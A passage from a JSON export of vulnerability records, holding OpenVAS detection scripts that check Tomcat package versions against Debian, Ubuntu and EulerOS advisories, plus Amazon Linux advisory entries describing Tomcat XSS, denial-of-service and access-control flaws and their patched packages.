script_xref(name:\"URL\", value:\"https://bugs.debian.org/898935\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the DLA-1883-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\nsection 4.1.18 and therefore does not protect applications from\nthe presence of untrusted client data in the HTTP_PROXY\nenvironment variable, which might allow remote attackers to\nredirect an application's outbound HTTP traffic to an arbitrary\nproxy server via a crafted Proxy header in an HTTP request, aka an\n'httpoxy' issue. The 'cgi' servlet now has a 'envHttpHeaders'\nparameter to filter environment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache\nTomcat are insecure and enable 'supportsCredentials' for all\norigins. It is expected that users of the CORS filter will have\nconfigured it appropriately for their environment rather than\nusing it in the default configuration. Therefore, it is expected\nthat most users will not be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided\ndata without escaping and is, therefore, vulnerable to XSS. SSI is\ndisabled by default. The printenv command is intended for\ndebugging and is unlikely to be present in a production website.\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-17T00:36:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for tomcat8 USN-4128-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0199", "CVE-2019-10072", "CVE-2019-0221"], "modified": "2019-09-16T00:00:00", "id": "OPENVAS:1361412562310844170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844170", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844170\");\n script_version(\"2019-09-16T07:48:47+0000\");\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0199\", \"CVE-2019-10072\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-16 07:48:47 +0000 (Mon, 16 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-11 02:00:49 +0000 (Wed, 11 Sep 2019)\");\n script_name(\"Ubuntu Update for tomcat8 USN-4128-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4128-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-September/005109.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the USN-4128-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Tomcat 8 SSI printenv command echoed user\nprovided data without escaping it. An attacker could possibly use this\nissue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 8 did not address HTTP/2 connection window\nexhaustion on write while addressing CVE-2019-0199. An attacker could\npossibly use this issue to cause a denial of service. (CVE-2019-10072)\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.39-1ubuntu1~18.04.3\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.39-1ubuntu1~18.04.3\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.10\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.10\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-09-20T14:38:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-19T00:00:00", "type": "openvas", "title": "Ubuntu Update for tomcat9 USN-4128-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0199", "CVE-2019-10072", "CVE-2019-0221"], "modified": "2019-09-20T00:00:00", "id": "OPENVAS:1361412562310844181", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844181", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844181\");\n script_version(\"2019-09-20T05:25:28+0000\");\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0199\", \"CVE-2019-10072\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 05:25:28 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-19 02:03:05 +0000 (Thu, 19 Sep 2019)\");\n script_name(\"Ubuntu Update for tomcat9 USN-4128-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.04)\");\n\n script_xref(name:\"USN\", value:\"4128-2\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-September/005126.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat9'\n package(s) announced via the USN-4128-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Tomcat 9 SSI printenv command echoed user\u00a0\nprovided data without escaping it. An attacker could possibly use this\u00a0\nissue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 9 did not address HTTP/2 connection window\nexhaustion on write while addressing CVE-2019-0199. An attacker could\u00a0\npossibly use this issue to cause a denial of service. (CVE-2019-10072)\");\n\n script_tag(name:\"affected\", value:\"'tomcat9' package(s) on Ubuntu 19.04, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libtomcat9-java\", ver:\"9.0.16-3ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"tomcat9\", ver:\"9.0.16-3ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libtomcat9-java\", ver:\"9.0.16-3ubuntu0.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"tomcat9\", ver:\"9.0.16-3ubuntu0.19.04.1\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-20T18:46:27", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-2361)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8034", "CVE-2019-0221"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220192361", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192361", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2361\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8034\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:51:18 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-2361)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2361\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2361\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2019-2361 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The URL pattern of '' (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.(CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.(CVE-2018-1305)\n\nThe SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\n\nThe host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.(CVE-2018-8034)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~8.h6\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-08T12:58:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-12-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4596-1 (tomcat8 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12418", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-17563", "CVE-2018-11784", "CVE-2019-0221"], "modified": "2019-12-29T00:00:00", "id": "OPENVAS:1361412562310704596", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704596", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704596\");\n script_version(\"2019-12-29T03:00:16+0000\");\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-29 03:00:16 +0000 (Sun, 29 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-12-29 03:00:16 +0000 (Sun, 29 Dec 2019)\");\n script_name(\"Debian Security Advisory DSA 4596-1 (tomcat8 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4596.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4596-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the DSA-4596-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several issues were discovered in the Tomcat servlet and JSP engine, which\ncould result in session fixation attacks, information disclosure, cross-site\nscripting, denial of service via resource exhaustion and insecure\nredirects.\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 8.5.50-0+deb9u1. This update also requires an updated version\nof tomcat-native which has been updated to 1.2.21-1~deb9u1.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.50-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2023-02-08T17:12:47", "description": "**Issue Overview:**\n\nThe SSI printenv command in Apache Tomcat echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. (CVE-2019-0221)\n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n \u00a0\u00a0\u00a0 tomcat7-admin-webapps-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-jsp-2.2-api-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-docs-webapp-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-javadoc-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-el-2.2-api-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-log4j-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-servlet-3.0-api-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-lib-7.0.94-1.35.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat7-webapps-7.0.94-1.35.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 tomcat7-7.0.94-1.35.amzn1.src \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-0221](<https://access.redhat.com/security/cve/CVE-2019-0221>)\n\nMitre: [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-07-17T23:23:00", "type": "amazon", "title": "Low: tomcat7", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-07-25T18:35:00", "id": "ALAS-2019-1235", "href": "https://alas.aws.amazon.com/ALAS-2019-1235.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-08T17:12:48", "description": "**Issue Overview:**\n\nThe HTTP/2 implementation in Apache Tomcat accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. (CVE-2019-0199)\n\n \nThe SSI printenv command in Apache Tomcat echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. (CVE-2019-0221)\n\n \n**Affected Packages:** \n\n\ntomcat8\n\n \n**Issue Correction:** \nRun _yum update tomcat8_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n \u00a0\u00a0\u00a0 tomcat8-servlet-3.1-api-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-lib-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-jsp-2.3-api-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-docs-webapp-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-el-3.0-api-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-javadoc-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-admin-webapps-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-webapps-8.5.42-1.80.amzn1.noarch \n \u00a0\u00a0\u00a0 tomcat8-log4j-8.5.42-1.80.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 tomcat8-8.5.42-1.80.amzn1.src \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-0199](<https://access.redhat.com/security/cve/CVE-2019-0199>), [CVE-2019-0221](<https://access.redhat.com/security/cve/CVE-2019-0221>)\n\nMitre: [CVE-2019-0199](<https://vulners.com/cve/CVE-2019-0199>), [CVE-2019-0221](<https://vulners.com/cve/CVE-2019-0221>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 